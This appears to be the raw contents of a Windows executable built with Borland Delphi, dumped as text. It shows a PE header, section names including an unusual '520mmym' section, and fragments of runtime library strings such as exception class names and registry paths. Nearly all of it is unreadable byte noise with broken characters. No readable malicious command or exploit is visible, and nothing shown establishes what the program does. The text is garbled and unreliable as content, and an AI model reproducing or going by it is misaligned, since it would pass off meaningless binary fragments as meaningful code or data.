MZ@       ��  �       
       � �	�!�L�!            .$@   PE  L ^B*        � �� X              p   @                     j                @                        � \   �                                                    �                    �� T                           .text   x�     �                @  �.data   (   �     �             @  �.rsrc      �     �             @  �520mmym j      j    �             @  �                                        } �� D� @ Boolean  �  False True�@ @, Char�  � �@  Integer� ������AXByte,pAl Word � ��Cardinal0���� 
String� 

Wide0�  Variant�� �
Ole@@H� �@:@ L P PT H �7@ P� � TObject(4 P�apSystem  H 
I	rfaceFa��0F.@� x0	 IDispatc!hD  /�@/ �̃D$��iN  
0��
`�
 �̥B �� �J pMP� �@4@@ �(�	�  �\$�_@ � $Q`$q(T�`d!1���%<�F 8@U4@0@,@(@U$@ @@@U@@P@@U@@L@ @*��0�@�@�@�@�@�@�@�@�@�@H�`@�@�@�@`� @\@X@� @��@p@l@h@�� @�@�@� S�ļ�
�T�@Y8�D$,t �\$0����D[�,�4@U�@�@�@�@T�@�@�d0V� �F �> u :hD  j  �m �ȅ�u 3�^[á�! ��3� ����D� ���B� �du�� �, �� �@@� SV���$�K ��I@� �P�V�P ���X�B�� P��
�Q���� �SVWUQ�� �$��] �$j. �V �;x SS ;�u��跀�C��C F�F;Cu � ���;�uË֋��V �� u3��Z]`_� p��������2L ;�r p��J�� k;�wb; �u�BC@ )C�{ uHb 9M �?�΋z�/@ u){�*�@
B �$�{ {+��|$ +��s�Ԑ9 ���P�� ��;�u�3�Y�0�� ������� }B����e�@�U�sjh    V����� ��;��t#	�Ӹ�H�ld0h ���P4��' � dPU�Dٴ��C@ (jP hU襘S`uy�)0VU�A�% ��; wpn� w�bw@�`p��L$��D$@#3҉T$��$ŉD$�O�Q�s ;�wF��C; w;;t$s� P(v5 u@V��C��"
��F B�v��߁�Yu0��ov �|$ t�T$�
 +�  ����(���@� Ћ�� �� �$���� �� L�(� +�F@�5�  <�^�~ �;�v��;|$v� ;�vX  +�WS�&�@�P�
�6��� ��8�� t,؋�Т�� 4$��`�@P���+� A�P8�`$s �$;�s#��� h E� ;��B���`��2x�<S���� ���?� � �z  ] �3;{S,!�Y躒w
tP�FM#FMc>���q �5
�uFɫ���/!(�̻#�! �<$ u� 豼Y27C1\x��P��bt;su�W� �`�H���+S̬ V�ۀ� tM3 ��� ]��3u�3��%�]$��N`���G`4G�GP�f�K��2 K@ �H�k;�uJ:I5�� �= q�l0�8 t( @�O!	 RQR��RyJ@�R�#���(��!�!4$`�A ;�s[�ϋ�+�E �l ��0�O�]U �\$��t�`��"9�  ��0�<0��{�� �U��3�U hb@ d�2d�"h�(9� ���=M�F  t
0. a4��
O �
(�
 x�
 h������$ �= t/���3 ɉL��@=��u� �� �
 ��- 3�ZYYd�4hi� ���] ���#  ��.D]�S�= 3��j �F�PA�dfA h0 ��P�M4 3�� �D<UCP�% ���D�1� 1
�!u
 �'��t�2P���`-u��`M� ���) �
0�
 ����[]�S;uX	��H�H��8��� y������ ����$p�@�T�� ��P�	PH ����J;�rJ ���u���4����ʃ� ���|�����@��[Ã�|�ʁɵ�� �[����@ �Ѓ�U ⢬ �����<��|�!�+��ʕ�J 
Jp ��H@ ���at*E��ځ�d +Ë�3�°�� P�t@ F�r+�;pP�	 芄0 ދ�de��3����t@%Z�؋�u��dX�2 �F�#�0�ǰ�	�$ �& �&؅��B��k����Ѝ7+��  ��+���+Ń�}��o	tş ׂ� �F� � l$��t4��+�c cc�D$�Ys
�7+�� 
���$����F�@H�߉sQ ƃ��p�	f7�օ�M���d2�D�P�� �\���[��:�C��
Z�A,? <  |Q&I�9����"�.��@�=7~@�	0}�1d � +����O E�1(�� &�6���� ��<$����,��5M�#��M%��*R�;�s
L )G� � t$;�s�p� P�
��I�q��eo �� �G� ��0�`Q�:ԍC0�D-Kt�� �Wk��YaZ$&�7؋̍j��1�&1�`03҅�����$=t5�T���uvE���|*����1 ����I�+~{[  ���B;t��cBYr���uN A�03��H  ;u �)u "�}�u��%E �!5(!��S�"4��5�PL� �S��0+�T�֒ �T����;
u�=�" ?��aN��"(U�#�/Fu	��X��t�	~
���T�3�Uh!#F1d�!��  �������}���G����*�q��"ty��ïB;�u*��% ��|���&�`˿�K'�D��
�M��M�N� ��R�P� �@�]%� $ ��;�Jg) \S 2C�1T�!�U�	IU �2����E��f1�+����3��E��YY]���Q\5����Q5�fF�3� �E��a�A�T$���s�����uC0	<K� ��&��%� )%��tED���P��J���t?@
?����+�;P�S� ,�TBw6����;=Hu,V)P!h!��4~��p"���I �a��tJ"G��T�7 ��)�ǃPx�	}�x� e$ � ��ȕB�ӑ'�	�����>8�W��X��]�k���������������}��� �ǋ�;�u�雤;���'�+֤�
;!u8)�^"~���L6 � @) ���3���u�P$����|�ݩ�������� �<��1���@gA&�|S��h@
 {0S( 0h5$�P7"�E B%'��u��Z�	>
� ߱M��ª	$;�&}����r �,�� � � ��KƋ� nN�:rK� T�.�X!��8�����s ��	w����|���m�Sf{S�4��{#E�NKY'�N�� ք �	�� �]��6xP������ �nS;�}�ƅ�tFˑ�:Ҹ	< ��}�r`�n h�������T��~�@`p� ���D�1�3ۋÄ	Ѝ  D @t� �$ ����t@2�P���@H( Y	�t�ð��� �`A	�u�ð�� 2 P���z02�2 � �>  ��" � �X� �K @�3��� �� �B SV�u"�(�g"�" ^�fY �F�0�7�'� �b���=@1��@��u��P�����Aw��Ê�LB �
���A "�$��驉PRQ��=�; Y ZXu�1��a�����  @�[ [�VW��@�^1�
t+ ��~9� )�@��|9 �ֈG�����1 ������_^� T �fjR �0�_ ����+�  d�׉�9�wt/%x *���� �_^Ít1��|9���@����  B�9.�S������< v �;"u�{ "u��� �3���C<"u1S��, �S��
�+� �<`"u�; tS�'`��'�< w���� �!� ߋ>3�!�Q8 8S�v30S�l
 ;�v ��7CF
;�w�a`�aS�H.`>.�h �(���sj�3�Uh�*�0d� 3��D: �U�:��,
 �� � }� tF�몗c�9 ���%��b���Ɗ#��
W���9
D @�$ ��uh����Pj ��E�  ȋ�  ��
����&� �n=���t@�� N���`= �0<ar< zw, Ðf!� ����- Ðj �<$X Ð���<$�XZ�� � |$�f�L$  �l$� |$��,$Y�$0=,##�	&���{�.H3f�_
f=��rf=��v�f�,�tv
�ZWf� s�{H u �{ u�C�,Q��S�s$)��#f����5d ��C@j �C`Pv P�P�9���`�@�	 ��mu35�[$�;�tQ6sh
&C iV�AP A0�g	 1L�@S-| S�����H�R ���f�C��	����K�/8 �r0�V��1x �Ff�F- ��9Ht Ht.�g����#A� �F(/�'@0�uP�)�h) �F$��  d �~H �� j h Qj RP�FHP�������f�~����% f�Nj �6��$ 	@�� -� s1�jK P �@ �\ ��X a *���R! �! ZH�� 1�9�sk�� t@��jj )�J�J0> @� Huv�=�G�-�F� ��F���t j����蓀�j��j�$�@�0t9�0��,tQ  ��$�UF &1� ^� ����f%�F��iT�0$�3 ��F��3ɺ��y�D��C�13� �4<f�C�bC�0�B���P� ���SHY�D���� �D0H|�Nf�Hf�� If� �s���Ӏ�3��=�F t=�0 �g:3�'�5�P�HF�P �TVV!��3��r/�w)f %��f=��u�F �S��� J$t� o\ ���P�t
��v�[p��� :�v�ˈB@��� ��p�  x/U&1�1� ��FG)� w�R�� t&��9� uDJt�N�_ 7�� ��Ju�� ����Z� �t�: u/Jt�N :Ou$Jt �N:Ou ��Z8�u 8�u���� 8��4������q�Hd ENq H�@Zq8���� Nq ��� ^��t6�:
u0Nq H:Ju%Nq H:Ju8[0�^r� �W�� �͉���f�ȉ�0	�%��I�_AP�@lۿ��� �F�� t� � ��-tb��+t_��$ xtZ��XtU��0u( xt@HC��t �@ -��0�� 	w%9�w!����* � ���t	��} T�	F��� ~KxI[)��G��! 뜿@+ t߀�ar�� M0v� ���wЀ!�
X ���VP ���u��Y1��2c�8���"��"��S�f�{�!��F M
m#�Z:�
�f�x� ��8%	t5�x@xM+P9�  P)�PQ����P�YX�����"YX�H�(� �Ѻl2@ � �@~d��@PQ�@u�[ �\`4�i@ �YX� ��-���4pcP �Ct�$�D$
���%�& ���� 0���'�C�K�]��R�5<P��v � B�@�Iu�Z)Ј\�s#�3�@ ��1ۅ�|M�� = t@����� �۬S�3@  ����ty�t0550tad۬C˄ �S��I }F�E��E4E�  t@E������ ��5 ����1�[���
`L?
@����
P�
@@�
@P�
@$�
0���
0 ��B
0(k�
0�� 
 @�C�A#
 ���&
 *焑�	D � �-
�1�_ �0
���@4
�.���7�
 @v:k�:�
 �#Ǌ>�
 b���x�A��z�&��D @ ��n2x� �H@ �W
? h�K@ �� ����N@� �@aQY�R @ȥ���o �U@: �' ���X@�	� �x9?�\@� �6���_ @�Ng��� �b@�"�E@ |o�e@��p +��ŝi@� ���Ix�� @����� �=A���� G���A�� +��Bk U'9��p�| B0�<���R ��B����� �~�QC�/j \�&һCv ���)/��& D�
�� '� ��D��� ����DY�� ����dE� ����Jz�� Eb����> �9FǑ�� ��Fu ��uv�HM� ��9;5��� S�]=�];� ��Z�� � T��7a�Z� �%]���g� �'���]݀ n�� �R` �%u�Y�nb 5��{��%!D���S3�%@�h��uj�� % =" p	= �u���������E���Pj2	 �h������*M�"�6�[�E�F�E�P�E��4 c4 YP�3 �kh�4  � ��nDn�f�qf% ��f�U�f��?f;�� ]� SOFTW ARE\Borl and\Delp hi\RTL F PUMaskValue����K���������$׋p�1ɊA�=�1�	�t�@ ;J�uJ� <2<��� uIu�C�؉�@ܱ�D$��&��� i\�.P�U.�� �< ���8 �Ҍ���H� �D�	 d����a� ~�v	  Ðq ���Q�\�É� ��K�1�Q��I�YQ'� Љ�K���tQ�[�	 ���9�t [����s@��{�4��Iu u`�XW Ƌ6�V ��v܅�t�9�	�" 	�с��s  �r���!��a��  ��Ћ���PD"�� 3ۉ]����.!09&n��� �c'�1c�  ��>�>  t!�P� � P��M������r0U��	fpl & �KXB7�^ {�=���K.�� YM��CD�a )���2 ;0u�r; pu�r; pu�r;pt��"ܸJq��(; �ִ��� ��*��8a ���	9 �t�I܅�u�
�	��f~Ѕ� t�Q���f�t
Yw@���X�)��tG�_�PQ� ��� YXt��Y��"�V�� � ��^uY�0^  9�t�"u�Ք x�x"��� ��PVf�2f	 �tf�� �Ds* �XV Xt��^��^w a�)1�1��Da�p�Jf �>���N 8��OuD�y0��+ �  �\12���u�I FqpRP@q �p�O PO O0�t1Ou�N0�Z�� ��P��PZ�RRQ S��|�P� 1ҍL$d� ��i�AE;)Ad�
[YZ��N`�D$,�@����PZX,�	�D�0,�4R��S�9���PR�ZXÐ�=(e0v������!P t	PPRT�h�`
��XhTY%�� XP	P�s��Jl`PS0��\I��A �9�t�9� u��AA����� 4PUI�5 Qr0�r`mYY
\p�  � `jZ� P�0�pX�d N�@m �_�8�"  �P�Htn��o�0 ����H҅����T$� L$�9���t7���	�=I,:v)CAw �PQ��� X���){�H�0`;0v�;PP�D$RQP�`=0Ip�H�VWUd�S� (�hp=@�� �|$(�?)� ������o��G�) ��!�f� ���H- ��' ��� A�<� ���,�o,at��I�J&AS &u
�H�@)T $9U�J� Y�q	�ŋE�C��?� �t7�H�;O�u��W�&�	@B��"t��4 �u�`
Ku�]=�!D&$��A��!t �2��qYq�A	Ԫ�Q��Q�'��	�FӋam1ۃ��V���)
�A[�!�'̉�$?���˂(�c�#���, �� ����O�AtCT�B|O b!%jB�U�$�8P	���d��ZTUWV� Tjjh=R�%��#` 0�@�P )�����0
��0B�`��A�B�� � ���1��� d�Y���{p��I��݀9Z�d$,1��X]�/���1�Y�� d������ �U�=�   �,t\=��	tW-� �t\-�=HtN �`q��?� �r6t0�R =�*t=-��*.HtHt$�:-�/�� =t&�,��� *���&���"��� � ������ �����
� ������ �%��R����]��$sh�k@B�P�$��="tq)��v��6.U�S\�U;�"S�C)t�t���؅4B�jS�|�*"�kѕ�@ٛQ�$�X��	1<'bE�d$�
S���@�ah�<��  i��& 9�T@ , Ë	���t9u��
dÈl�8, �G@/ H�_�p3�UhB' 2d�"��~"K� D�{�Ѕ���X�%�}_����6�� 6]�+` �@@�0K�03ۋPx^ v^`;�~��C�D'0�` ;��`�`TP`'`v``���|T�r�
 D�n3��N�BH�B�0 �D�i�8  �aa��WV�<� �F����b!�	�Ou�^_p	$��% =%P�%��;(�F���LPVW�p�I�� U� �
������ 03�����û0���I ��u۱��,н��� 3ۊو�I����81��T���@�1_ �o�w�w �7�V �_^Ʉ3Q�=L�
tWf�= � F ��u�=A(
  v� �8 j �"j h�j��j���P� P5hTB O � ZÀ=04u��h
 ?0 � S ��� � �R�����H� � {( u�?  t���3������ u�= ��<�2J �6 u`
��C��8{(v�;CBb�/VS �B;BtB
 P�
� �`��1u�S$��t�f �; u3!��	�͵V����bA^�vɑ 8ã��<)&�����B�U1�h�d �Rd�!�E �H�QR �!ZX��1G�
Y]�$8+(���� �ր��8�U�P
�M� ZR �URP�HE@ PVS�� �1����̐�Hd�� �J �I|��J� u
P�B���W �	�-֋* j�~*@* )v�) �Nu�� �( D$" A�
B���.��XR�H��(�����B��|L�*L �D 
D~*�	 *�, ~$P��
���P���a f�D���Z�P��@��&6@���ω�������	���o���蹖;P3lPRP� PQj ���F P�m=���d1P���� �P���|$��
��	>�d � _�n���  }(V��,���^�| �T"ǋ��A� �,��� ��"V�3� T0@}]o� }   �"R�$���y Z��1�R!R:
 t:Jt: Jt:Jt ����BB B��Z)����/ L&0-Rf;

t f;-  (t 4����0: ���A�<`�
B� �WPQ��1� �u��X�X_�i` �J�8 �8@S �Z��9� |�و@� ���[��  ����@��+  ?����~���A�y��V� �9�t�^�����N����E �G� �����DPaB<B ;t\
;tX
- ZX�bXӉ� P�C�F��H� ��;؋K��MS ��c S��> X���`�O���R�q����  I�|&VWRP��1��L��9���ϋA�J�1�@	A� 9�u1�JuP�R �
$�w��=�<$� 77K���[ P�ƋD�(��
t�� ����Ku�ZTXq� n�U�, Z� X�$��@�?�Ɖ�9���+hl k �F��W�)� w�R�� t&��9� uXJt�NЇ K��J u����� �Z��t"�,8�uAJt 8�u:Jt�F�A ��9 '	��#a �k � Z1 . ���� 8b��3� P�B@`�(*� ��Jh@�&8&t2S,��{�M	,�$P~�ޔ�H�G4Hq@��܄;[��t鷅����0Sa -�X�&J| 9�})Ӆ�|9�d�e �1������ ���[�p4袢�D0�N|*9� }&��~")� 9�~��)����  �SR�)��v���� VPM0�2R�# O}9@�A ׋k�����u3 X9� u���@/� )���������� $D@O 1� B�O�W7Jx �F)�~���� ��_^t� �Z1��QZ��)p�F��01���~H�W #�x �u��� �	P���m������p�Ɓ[�(���;."��2 ��� 9F�������X��U�u��@ ��~��#�����i3�
�3���%S�ʠa�aK�)�Q �v���Y��[�	 ð�d� dP����X �I �$~&R�t� h"47PR.� X 1u$��(7P�d '�$1���
��� QRP�5s@�$�8��]8� �lԽ~8v9� �*-��&�6v>.@�6f$6�pt P���ť0Z�2�� LF���\A< � )<#�[�bN��I��蠔tr�]Q�T��p�t4����f�f�f�" !��4�4^Z	�4 �B|iڈ�	��]� �� }3��K;�}O� +�;� W�֋M��:��) �(tK� :�xs��z��Jx f�� �	f�u�Cf��CS�
�S�����3�'� @,��؋��w %	;� Ƌ�ɋ� ���  �K=�1S�J@e�t
�| �F؋s@8���<4 `� �c1Ҋ� V1�<
t" <t<t$ <t3<tM <t<t
"�= �|ص�O��E� �K�K�K ��O�� 2U�ՋT.
 ��\.�L.��rO�]� 0���E ��4� �ibP"��'�`��A�=Y,�	ð���M �� ������ U%� >� Q� \� v<��- <
����j� ��
������蝺�`�Pw ��	n���g� ��_��!A��]�+C�  C�؉H���������"X�lD1
D!�=Q�	�* �$�%�� A�|
�o@��O�Q�O )�~���%4=�G� ��
��
t 1��t=�� tI��tU��tp��1J�v ��2�	 �H��Ul �0 ��������
 �}0�90*l� Q� ��  �[v
J�tE �L�	$0La �;   Q(��0,= X�"�[0��[ �ђ0�@GD
M�2 Y� 
���K� �8E��l$��`UC�R�a�}� �
� ��p^խ7�0��C&�Mu��l�5��`�z���R����Tf� O�9��O�w�@c� 7Mua�t ���37 ��G\8t8Mu�fh��fp>(����P���R�0N��P�w�^
<P�]X�`T \������� 07Q��$�
 ���Ћ΋$��0�ZTHQ�b���
��)�ȋĲ��  $Z$ ��1��S �D$�$$ ��	 �d$0�& 	 �YY�B�)U���S�G��3��A� ���u6 �(�@�! E�|.� t��[  �D.�<-uE �<+uE�D#$t(�3�<Xt0 ��Q �.�� ���9 E�1�Ѐ�Ѐ� 
r�����r����z������0�p7��pW�|� u	   rG�|Ch� B0�v�0.�Ǚ 1 �T$����$&����T$E3��f< �G|� ���` �؃� ��*P3����sb����PI� E����*u
 
 ̘ /)-^
�P�:��� Ǚ��됗 ti��u0u t0@
 �����:i tM�  ��
�t��!�3҉ZP��k`.�{� H���u����/�����,   ��� M ���E��] ���E�8����ѿ ��ęW �J< �E�
	���E� 3��FƳ P�U�P�/�2�3� ���m�E� �E���;E(�tY)Y �E�@��;u5�]�;}�}1	��z��� U�M�+Pρ ;� �E��U���ϖ ]�	�^�V � ؋E��E�;}�}�}�G *�U�CN c����E�P�U�#�c0����J	@M* M�Ӄ�S� � �x? �; ��+U��P E��E�P�T JT �}� ~.�E�M �O��|"G�0E��NP�E����e�舁m �E�Ou�e $����T�$�j Ð(�G3�;��I�u'P��6TZWw# c�]������Bx��B�X ��K�uPR���C�裬X�,2�>D��0j��H����� �u�����8h.V���� �؃{ u+h%� P�CP�A� Ĳ��
��s� � C�C���/ ��8��  ;Bt
;B t;Bu���k ��u ���P�� �����t��\u�ü�3İ��U��P E�hl[@ �Q��@h| V� ��/��0��; ��P�A��E�P�&�	0 �"*  �8\u8x\�0���Ed��>}���F�'@��u���+]��C] h@襔� �9@9�� �+Ƌ��B"����� @ PV30�P�p�5 ���~H`���t���ttV�D� ��� �L�,S�@=NUƄ3\��+�HC * _P@P�` @0 @	؋���V��'��{E��2�k ernel32.dll�GetL ongPathNameA�!�_ ��E��A�o�[�O �E� �g h   j h�]@ h& ��� ��g��w0T"��<`Y �@�F�Uh�\@  d�0d� �4E�+	�@��蠀� �E�P�E j�P��g` p2h�h  �� ���E�k ZYYd�h�p " ȅ" ���s�� �2a � j�E�Pj�n P�@ 3����!U�}�,�4}��F>P]+ �؀0��K�;.t
0;�u��
P��6 CAt(��+�2�� S���`��I�L3ujytd0�8��8 �( 8��8P2�E�@6� �6�L�6 ��R2�of tware\Bo rland\LocalesL�Delphi#�>�B#0S�ظB�$O�i <���X�
�SV0�5<"�V;�u�� �" �<�1> <ֈ�'�
��Y@f���](P	( ��l+�t'��E�Y �ED�> t9��^��R�]��SX�C2�
������+�#�9Puǌ~YY]\ P5�h�l0Qg 3�Uh`_Y2d�"��@�t��bg�  ;9u�&�E ���%�t�;U�u	:'�� � u���+��� 0��6 PR��PX�` *	R�P X�� ��uËQ! Ä��t@����� W��j TQF������  P!� \�_�`R��~���&�!x���6 � ���@���S�]�M�U����� 3���@ �[]� D!��Z MZ H)<V= ���? �"	���� �Q��)��y� �A� t�$�Ѱ�2�D"{	�bU������$3ɫ��+.�U ��JA�� w�0F� Y���  v 1�^;]�w S��������0�� ?�ˀ�\0 ��?�ʀ�T 0��� �)^1"&0��1 �"`�;Ms;u�r��N�0 �"iu� H�v
�@FFF r�V�"� � ����7�}��6*#�	��E���3��}�� ��@�3U�3Ɋ 2F���tl;u�؁�?�� t. � 2F�ڀ������� & ���?�����ы�.��%�@f& M�f�A�UU	 B@N s'	;� �p� 	 	E�H�B�PG"B\@�tP05X �� t@@������*u�
dr=�@�
Z�2ji�hKcd�� @�g�3���
��t^��	 �B��/��b| ���P� ZP��YZ�@����~��JJ8��
�Ñ�U���
 dhR� � ���}�/ � ����﬐j�� k	]� 	� �I�C� ��@%��@��@� �� ����� �01��� c
 �`��@ ��X��?d�P/ ��-p �<<	PpF' �P���P��p M�� =�{    }*h �	 k�= ��"��. ȋ�/��
� S�+��K 5 v�S�U�
e�Uj�U�Rh�P�5�M �E� �| 0�]����+Lt3��`�I 2 ����=ڝ���Z't �bk �����#�@P������)�
 
�
 M����`Pi> 
����X � �B-C�ş �!:�P |@ �
 F�
 �N
   � �T���~%$�	 �tyf�%T ��	  � �	 � ����
���@��
<�
�
 %�=t-��f��v��� �T � ��B���u�P�sW4W Ð�%�����%T�@|@x Pj+@�^�T��d(0��,$6�=���u
���Z�#�  ?0�� �P�*P�@� [Êd� F  ��u&d�,���h�! ,@nH t�4�p. ]0��#��! ���l�3��2d+" �fh\��  ��0�5�" �?� YM�[0G0mg0rhl@ bt ����e�-hh��SH�C
�K<��Q 3$`ȁ  U�S& �x@�x�tx��x b�x��� %.1�  �  
odSelec tedodGrayed Dis abled	odCheck
 Focus
 Default) HotLighInactive  NoAccel
6 R�b odReserved1�2�d omboBox EditWin dows��h@  TOwne rDrawState�l�tB��@�@�@�@��@�@�@�@��@��0�@�@V�@�@� ) P�}�@���P�
�	 $�0@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U|@x@t@p@Ul@h@d@`@U\@X@T@P@UL@H@D@@@U<@8@4@0@U,@(@$@ @U@@@@U@@@ @U�(B�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@S�@�@��@@M@(� A@ @U@@@@U@@@ @U�`@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U|@x@t@p@Ul@h@d@`@U\@X@T@P@UL@H@D@@@U<@8@4@0@j, R@$@ @�@@xQ�xA@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@|@x@Ut@p@l@h@Ud@`@\@X@UT@P@L@H@UD@@@<@8@U4@0@,@(@U$@ @@@U@@@@S@ @��xC@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�`�U�@�@|@x@Ut@p�l@h@Ud@`@\@X@UT@P@L@H@UD@@@<@8@U4@0@,@(@U$@ @@@U@@@@U@ @��E�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@�@�@U�@�@|@x@Ut@p@l@h@Ud@`@\@X@UT@P@L@H@UD@@@<@8@H4 � ������c��3��A�
 3�ÐRP�1 P�K0Q HP�Y �D .�,0 ? ����` Q� $�$� �D$�B Z�Qf�f� $f�@f�� �$Zh �c���"� �
QSVW �M������=a����  U     P$ ( �PWV2��1�:� _^[Y]�$ ]�X�	X�T�^VPf�KVP  d=X� ���E�hHu@ h\ �I�bhd� U��ht� �h��> t{@j��PS�$�3 ��� 3҉�?$�$ U $ $ 	� �*/(�Ý0 Mag ellan MSWHEELWMo�"Z 0_ROL	LMSG H_  SUPPORT_�0 SC&_LINESP�M�� ��]x�� ��~y��}\.8v8pQ|8� ��F8������  ��@�@�@��@�@�@�@��@�@�@�@��@�@�@�@�@�@�@�@�@�@�@�@�@�@�@�@�@�@�@�@Ъ@�@�@�@Ԫ@�@�@�@ت@�@�@�@ܪ@�@�@�@��@�@�@�@Ī@�@�@�@Ȫ@�@�@�@̪@�@�@�@��@�@�@�@��@�@�@�@��@�@�@�@��@�@�@�@��@�@�@�@��@�@�@�@��@�@�@�@��  C!y s� �(� ��&� s=À P�P� @ �@ @:@ L P T AH �7@ � U� 2  �. @ 	Exception�\�� Y 4 h�,�h@EHeap[`�Dtz\� \�\�E OutOfMemory��\� ��� QEIn^ Error�X� X�	 EExternal��P{X� Xm�` X�X`lq�`�� `�	1��v|X� Xd` X�
 EDivByZero�`X� X�ERange� ��X� X�Overflowt}�\� d�
EMatNh� �lX� X��� X�InvalidOp��X� X�0E��ider~X� X�	EaQ�8�tX� �Und�Y0��X� ���`!Poin�(�\� �0�p\ Ca.stp�\� \�EConj�S�\�� ��EAccessViola��� @�`� ,�Pr�ylege��X�� X�EStacOk�R��\� D�p trolC��Lp�X� ��Vari^a�e�\� \��ses#�Faod�8� �  `�EAbstrac�0�{d\� \��f9\0p�\� ��EOS�V �X� �� ESafecal�ȇ0@ .74Ч�H@Sys Utils��T�$08$�
���$ h̴� DL�h�@  TThreadLo� Cou ̃���W R �@�V03�D$���*��
0+
`5
 �5��	  � V� � � �R �{��L� �W�q=? �( ,�@� < �� 0 ��0�_@ � <W`(; �@ $TMultiR� �lu siveWrit eSynchronize�S� Ӊ���f� �]f�f �[]� S �؋˲�8�@�<A��� �[�SVW�����  `3 rb  ��SV= � �9������ �3ɋ��p�� � x S�8qF ��   H�
�X�u�; �D�L �ظ ��A 1 �3@�P�X��� H�@ d0� D�~���9 ؋Pǅ S��֋7 ��t�<a r<zw,  �BFK��uj��P<P�<p<�A�< Zw<�VW �Ɖ�	�t�@�	� R� ��9�v�� 9��t� F��W�)�_^Ð00��1 �����x 
�u����u@! VWS�Q�*�^���a r��zw�� ����@�� 8�t� ����)�B[t9�tQ �N �H�;J�u�r��u ��1�Ð�q��!��á	 ��访-  �~	S�P�59��14�^4PU4pNz4���4`M* +�3 P #2 P>� ��j h����q�9 �8`��80�0� ���j80T^8��" �� �P��PپSWSV�7P'70�  U�������b � ���C;� |�|� v �;�}
��� ��N�|7� �U��+�A+��9 �� ]M�2�PPZP�f�|_� v�Q@�ĕQ N w �R�qf; R � �3�	@�h�tK� �,r
,t�,s9 `� � |+@��p �T>���� ��
r��� ��r��t��� s GHu۳�Àd �u	�y���= �-AN�ù
� V1���N�� 0��:r�� �	�u�Y Z)�)�v Ѱ0)���2Ju�6 V� ��1�R1�褉��X�CX9��^ l H0Z �@�t" �p�0��� $�T$ �\$�!�F� -NA���V ���|$� <$f�$  �,$f�$�P�EP'E �d$�s hP��l$ �,$������ ��(�$ ��N���$ ���$0< :r�� ��ӛ���s ��l$�� ��������@Y�0)ְ0Ѱ뀐h�  1�P1ҍE��@ f�� ^]�  ���� v$1�,0Q���X�*0<*@<2�������8�=�<$ t��D$�!�T�F 3��K�y��xBQ�ڋ��7 5 ��YZ�4Q#T�t lZ�R p�Ɉ �V#����F ���E$)j(����,� �g��( �)�� �1��7u�7p7@P707@���7�7 � ö�True%C Falst@Q�E� ����| F� E�D��������t � ��Nu�E��Y]< ��� S�ډE��U��E��5�  Є�t�m��h�@ ��I�{ U� 1���0z Y�4 ��!U��0�#0 W#`�  ��[��]|��7�X��-1B ����2 , ���t�Ƌr��z���$` i ���3ҊӋ&�<+�T04$� ������� ���w?�Ӂ��l ��@(w2w� jj ��%����PF P�"�D ��o�P2�	�4��:P"j �  �8H�' ��H��� l7DQQ8j �K	PWVS���"�!$��$Z�E�,� �,��!��EE�E��E� V�E�P�E�PS�f  ��(U��Y�P�*� � � �vP老 ���@@&��}����"K���;	<t�D]3�V�U�6I4�V @�V ���~(�(\>�B ��  ���-  �;OuOO�8��8��؋�������W�V�] C] �,8�\:8�7ָ, �8 e8� ~ �|�.uW�@0�B ���r�K0H�  .I SV���y�T�Ph�y j��,�� ȁJ ������  )��!�S��3��\R�U� � �RP�>�� �m�3҉E� �U�E�3�@R��U��@�" M��Q
�E���&�(M0�K� �������2�򮸹 �)������G�������*lW`V{&`�щ�� ։ʉ��� �у���^_�(�&�b ) �T �)��2��� t�uA)E�Y ���30�3 ���[40tڻ����8�l V	�Y�t �j#wW�0�* �  �#� ׉Ƥ 1�0�1��F����i ��$�t!& -{�0 ��_�_� )�t��pA �� 1�	�t/�� �h0D����� ��u3��@�:�u�X@��
D�
@�É�02�� �It.�Ή�`)�v �ߍ^��֬�[��W����_��u��1�TQ���" ����[.Ã�  tAue�#' ��iF^��	���� |!��
<�fM X%���O
�]�	v���J> $88�u5ċˋ��E �  �ĉD$ ��$= ��ed]���( % �$�F �9 t���&��)�U�0�� �p#�S3ۉ]� �ǉ�1�&}���E��E�Z9�t	�< %t�Ju��+E��#� @��^��] �E�<-u� ܬ�~� <:u
�]� ˬ��]���<.u
 ���@Z$ �]܉u�QR� Z�] �)�s1ۀ }�-u
)�s�$���P� �p� }� t
R�E��^ ZY�u��G��<*t "<0r=<9w9i�,0��� ���X�0�E�;E �E�] �|� �0�t� � �$߈ ��v(]�;] \)u�4� ��V�$��@ � E� ��@ � ]s S P U7 � �@ D\ 1����U �M�)ы]����u�� U�J�ˀ�D�����*��X�����U�� ��u�6 �˃�j86 V6�H6�:� ���S�jq	 l)� b f�8v��k@��u��J1ɠ!0A�Ƭ�� �=��G@ � �TH@ uY�  ! ; �S�  ��[�u��(� < 	�t ��N�;M�wËM�X0��JƠ2� �%O��)�_  P'��  �� � �  �r����� � �Ƴ � �Gt?��� Et8���F t���Nt�{ M��? �`��	v�9�v%`� u� ��F ��E ܺ���v$�
 SPq��
��ϥ�)���u��SP� �����X���e5s&�x�e#'	��t#�q��TW�P?���Y���	���E ]��@���@�1@� C0��(�@� �*�M����S����B )�M��U�v S�� ���=   .}&� ')l M������%�>�&w& �p�;�|C�0L���B!䴌z��PM�
�`^G 9 }ɋ֒!�- ���h�Α�K]^S!  �V1�� �u1��
	 �}�-��� �t��	�P���x3���CI}�	 ��K��9�u�X^�-��BԦE�����E��� ���� �� 󠉄 ��E���2" u���}�D.~Z"D���'% }r��E��@]& �}��E�-�1s���p��I�H�>�z�� -�u��]��t w	 �E�;E~� ���/	]� �ӥJ����� %h�c@� INF NAN��u �0NÀ}�  t�-����}�M�1�; M���|@.�0��>  t:�E���ٰ0��"$ABF t�����! f����(C1�����臘 �e$ �	I�y� < �+�����ɰE�]��U�J�!�� �^�U��r�R�� �  �*.t
� �H���� C���ItKu�E������ �  ��	= JtAu���f ���1ۊ]�r!!�]�K8 �v�� �
��)�h!�>� <@tQS<$tm
��!� ��M�  [YC���V�,u���
�$*@@@*$ $H  *  ($*)@-$-*L- *$ )*-�$ -.-8	 r-A3 *- (� )( )m4�2���É��E����t
